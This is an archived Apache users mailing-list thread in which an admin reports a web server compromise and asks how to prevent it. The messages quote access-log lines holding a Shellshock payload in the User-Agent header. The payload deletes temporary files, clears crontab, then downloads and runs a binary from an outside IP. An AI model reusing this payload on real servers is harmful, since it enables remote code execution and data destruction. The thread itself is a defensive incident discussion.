Re: Security question

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

To: users@xxxxxxxxxxxxxxxx
Subject: Re: Security question
From: Victor Sterpu <victor@xxxxxxxx>
Date: Thu, 02 Jul 2015 15:29:43 +0300
In-reply-to: <CAGBAQ459iWNJFfH4HdgdBCOTYa=4uw0XDxL5oXT+Mi1qoHysjg@mail.gmail.com>
Reply-to: users@xxxxxxxxxxxxxxxx
User-agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Thunderbird/31.7.0

In the end the attack was succesfull. Log show the last command:
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

But I don't know how he launched this script.
How can I prevent this?
I was hoping the server would execute only local scripts, is there something I can do to allow only local scripts to be executed?

On 02.07.2015 15:13, Yehuda Katz wrote:

It is an attempt to exploit a specific configuration. By the fact that apache returned a 404 (the log line says so), you can see that attempt was not successful.

- Y

Sent from a gizmo with a very small keyboard and hyperactive autocorrect.

On Jul 2, 2015 8:00 AM, "Victor Sterpu" <victor@xxxxxxxx> wrote:

Hello

A hacker attacked a apache2 web server by HTTP injection.
The log show what he has done:
62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

How can I prevent this in the future and how can I reproduce?
I tried to reproduce but is not clear how he launched this command and I want to know so I can test my vulnerabilities in the future.
The path "/phppath/cgi_wrapper" doesn't exist at all.

Thank you

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx

Follow-Ups:
- Re: Security question
  - From: Bremser, Kurt (AMOS Austria GmbH)
- Re: Security question
  - From: Eric Covener

References:
- Security question
  - From: Victor Sterpu
- Re: Security question
  - From: Yehuda Katz

Prev by Date: Re: Security question
Next by Date: Re: Security question
Previous by thread: Re: Security question
Next by thread: Re: Security question
Index(es):
- Date
- Thread

[Index of Archives] [Open SSH Users] [Linux ACPI] [Linux Kernel] [Linux Laptop] [Kernel Newbies] [Security] [Netfilter] [Bugtraq] [Squid] [Yosemite News] [MIPS Linux] [ARM Linux] [Linux Security] [Linux RAID] [Samba] [Video 4 Linux] [Device Mapper]

Powered by Linux